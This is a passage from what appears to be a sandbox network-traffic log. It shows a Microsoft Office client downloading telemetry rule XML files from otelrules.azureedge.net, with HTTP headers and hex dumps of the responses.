Session IDSource IPSource PortDestination IPDestination Port
89192.168.2.55259713.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:55:54 UTC192OUTGET /rules/rule701250v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:55:54 UTC584INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:55:54 GMT
Content-Type: text/xml
Content-Length: 1358
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
ETag: "0x8DC582BE022ECC5"
x-ms-request-id: c3c23e01-401e-008c-4e94-2986c2000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025554Z-17c5cb586f6lxnvg801rcb3n8n00000007a000000000f1ag
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
X-Cache-Info: L1_T2
Accept-Ranges: bytes
2024-10-30 02:55:54 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69 6f 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701250" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisio" S="Medium" /> <F T="2">


Session IDSource IPSource PortDestination IPDestination Port
90192.168.2.55259813.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:55:54 UTC192OUTGET /rules/rule700051v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:55:54 UTC563INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:55:54 GMT
Content-Type: text/xml
Content-Length: 1389
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
ETag: "0x8DC582BE10A6BC1"
x-ms-request-id: ebb042ec-b01e-0021-7980-29cab7000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025554Z-17c5cb586f6vcw6vtg5eymp4u800000005ng000000001mm9
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:55:54 UTC1389INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="


Session IDSource IPSource PortDestination IPDestination Port
91192.168.2.55259913.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:55:54 UTC192OUTGET /rules/rule700050v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:55:55 UTC584INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:55:54 GMT
Content-Type: text/xml
Content-Length: 1352
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
ETag: "0x8DC582BE9DEEE28"
x-ms-request-id: 174e4ed1-f01e-0052-3d1b-279224000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025554Z-16849878b78tg5n42kspfr0x4800000007eg00000000bf28
x-fd-int-roxy-purgeid: 0
X-Cache-Info: L1_T2
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:55:55 UTC1352INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="Medium" /> <F T="2"> <O T


Session IDSource IPSource PortDestination IPDestination Port
92192.168.2.55260013.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:55:54 UTC192OUTGET /rules/rule702951v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:55:55 UTC563INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:55:54 GMT
Content-Type: text/xml
Content-Length: 1405
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
ETag: "0x8DC582BE12B5C71"
x-ms-request-id: cdf7bdf1-501e-0029-3f94-27d0b8000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025554Z-17c5cb586f6sqz6f73fsew1zd8000000012g00000000exgv
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:55:55 UTC1405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702951" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke


Session IDSource IPSource PortDestination IPDestination Port
93192.168.2.55260113.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:55:55 UTC192OUTGET /rules/rule702950v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:55:55 UTC584INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:55:55 GMT
Content-Type: text/xml
Content-Length: 1368
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
ETag: "0x8DC582BDDC22447"
x-ms-request-id: 207ff7bf-701e-006f-1357-27afc4000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025555Z-16849878b7828dsgct3vrzta7000000005ug00000000dtzx
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
X-Cache-Info: L1_T2
Accept-Ranges: bytes
2024-10-30 02:55:55 UTC1368INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 72 61 6e 73 6c 61 74 6f 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702950" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTranslator" S="Medium" /> <F T=


Session IDSource IPSource PortDestination IPDestination Port
94192.168.2.55260213.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:55:55 UTC192OUTGET /rules/rule701151v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:55:55 UTC584INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:55:55 GMT
Content-Type: text/xml
Content-Length: 1401
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
ETag: "0x8DC582BE055B528"
x-ms-request-id: 04bfc9b2-001e-0017-54ad-260c3c000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025555Z-16849878b78qf2gleqhwczd21s00000007g000000000tdsk
x-fd-int-roxy-purgeid: 0
X-Cache-Info: L1_T2
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:55:55 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextA


Session IDSource IPSource PortDestination IPDestination Port
95192.168.2.55260313.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:55:55 UTC192OUTGET /rules/rule701150v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:55:55 UTC563INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:55:55 GMT
Content-Type: text/xml
Content-Length: 1364
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
ETag: "0x8DC582BE1223606"
x-ms-request-id: eff8debc-001e-0065-199c-270b73000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025555Z-15b8d89586f5s5nz3ffrgxn5ac000000087g000000001w09
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:55:55 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41 6e 64 46 6f 6e 74 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextAndFonts" S="Medium" /> <F T="2">


Session IDSource IPSource PortDestination IPDestination Port
96192.168.2.55260413.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:55:55 UTC192OUTGET /rules/rule702201v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:55:55 UTC584INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:55:55 GMT
Content-Type: text/xml
Content-Length: 1397
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:56 GMT
ETag: "0x8DC582BE7262739"
x-ms-request-id: f0c9e92d-201e-0000-1199-25a537000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025555Z-16849878b785jrf8dn0d2rczaw00000008hg00000000k49m
x-fd-int-roxy-purgeid: 0
X-Cache-Info: L1_T2
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:55:55 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTel


Session IDSource IPSource PortDestination IPDestination Port
97192.168.2.55260513.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:55:55 UTC192OUTGET /rules/rule702200v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:55:55 UTC563INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:55:55 GMT
Content-Type: text/xml
Content-Length: 1360
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
ETag: "0x8DC582BDDEB5124"
x-ms-request-id: 4f1f6d30-a01e-0070-1ae8-27573b000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025555Z-15b8d89586fmc8ck21zz2rtg1w00000004r0000000004ck0
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:55:55 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 6c 4d 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTellMe" S="Medium" /> <F T="2">


Session IDSource IPSource PortDestination IPDestination Port
98192.168.2.55260613.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:55:55 UTC192OUTGET /rules/rule700401v2s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:55:55 UTC584INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:55:55 GMT
Content-Type: text/xml
Content-Length: 1403
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
ETag: "0x8DC582BDCB4853F"
x-ms-request-id: 0df29f50-101e-005a-068d-27882b000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025555Z-16849878b78tg5n42kspfr0x4800000007gg00000000410b
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
X-Cache-Info: L1_T2
Accept-Ranges: bytes
2024-10-30 02:55:55 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 31 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700401" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


Session IDSource IPSource PortDestination IPDestination Port
99192.168.2.55260713.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:55:56 UTC192OUTGET /rules/rule700400v2s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:55:56 UTC563INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:55:56 GMT
Content-Type: text/xml
Content-Length: 1366
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT
ETag: "0x8DC582BDB779FC3"
x-ms-request-id: 22d1952d-101e-007a-6d50-26047e000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025556Z-r197bdfb6b4grkz4xgvkar0zcs000000070000000000gw9b
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:55:56 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 30 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 65 6d 65 74 72 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700400" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTelemetry" S="Medium" /> <F T="2


Session IDSource IPSource PortDestination IPDestination Port
100192.168.2.55260813.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:55:56 UTC192OUTGET /rules/rule700351v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:55:56 UTC563INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:55:56 GMT
Content-Type: text/xml
Content-Length: 1397
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
ETag: "0x8DC582BDFD43C07"
x-ms-request-id: 3bd815fc-c01e-0066-6070-26a1ec000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025556Z-16849878b787wpl5wqkt5731b40000000890000000001dqc
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
